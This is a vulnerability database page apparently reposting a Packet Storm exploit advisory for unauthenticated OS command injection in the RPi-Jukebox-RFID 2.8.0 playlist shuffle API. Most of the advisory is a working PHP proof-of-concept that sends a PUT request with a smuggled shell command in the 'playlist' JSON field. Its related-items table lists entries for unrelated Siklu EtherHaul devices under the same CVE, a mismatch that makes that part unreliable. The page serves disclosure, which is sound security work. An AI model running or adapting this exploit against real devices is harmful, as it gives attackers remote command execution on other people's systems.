Lucene search
K

๐Ÿ“„ RPi-Jukebox-RFID 2.8.0 Command Injection

๐Ÿ—“๏ธย 23 Jan 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 144ย Views

RPi-Jukebox-RFID 2.8.0 has unauthenticated OS command injection in /phoniebox/api/playlist/shuffle.php via playlist parameter.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-57176
24 Sep 202522:16
โ€“githubexploit
Circl
CVE-2025-57176
24 Sep 202520:16
โ€“circl
CNNVD
Ceragon EtherHaul series ไปฃ็ ้—ฎ้ข˜ๆผๆดž
15 Sep 202500:00
โ€“cnnvd
CVE
CVE-2025-57176
15 Sep 202500:00
โ€“cve
Cvelist
CVE-2025-57176
15 Sep 202500:00
โ€“cvelist
Exploit DB
Siklu EtherHaul Series EH-8010 - Arbitrary File Upload
17 Jan 202600:00
โ€“exploitdb
EUVD
EUVD-2025-29215
3 Oct 202520:07
โ€“euvd
ICS
Ceragon Siklu MultiHaul and EtherHaul Series
10 Mar 202605:00
โ€“ics
NVD
CVE-2025-57176
15 Sep 202517:15
โ€“nvd
Packet Storm
๐Ÿ“„ Siklu EtherHaul Series EH-8010 / EH-1200 Arbitrary File Upload
20 Jan 202600:00
โ€“packetstorm
Rows per page
=============================================================================================================================================
    | # Title     : RPi-Jukebox-RFID 2.8.0 OS Command Injection                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/MiczFlor/RPi-Jukebox-RFID                                                                                |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214067/ & CVE-2025-57176
    
    [+] Summary    : RPi-Jukebox-RFID version 2.8.0 suffers from an OS command injection vulnerability in the API endpoint:
                     /phoniebox/api/playlist/shuffle.php
                     The "playlist" JSON parameter is passed directly into a shell command without proper sanitization or escaping. This allows unauthenticated
    				 remote attackers to execute arbitrary system commands.
    
    [+] POC: A crafted PUT request with a malicious JSON payload allows execution of OS-level commands such as file creation.
    
             php poc.php 
    
    <?php
    
    
    $target = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php";
    
    $injectedCommand = "test';touch indoushka.txt;echo '";
    
    $data = json_encode([
        "playlist" => $injectedCommand,
        "shuffle"  => "true"
    ]);
    
    $headers = [
        "Content-Type: application/json",
        "User-Agent: Mozilla/5.0"
    ];
    
    $ch = curl_init($target);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    
    echo "[+] Sending malicious JSON payload...\n";
    $response = curl_exec($ch);
    
    if ($response === false) {
        echo "[-] cURL Error: " . curl_error($ch) . "\n";
    } else {
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        echo "[+] HTTP Status Code: {$httpCode}\n";
        echo "[*] If vulnerable, file 'indoushka.txt' will be created on the server.\n";
    }
    
    curl_close($ch);
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.14.3
EPSS0.00417
SSVC
144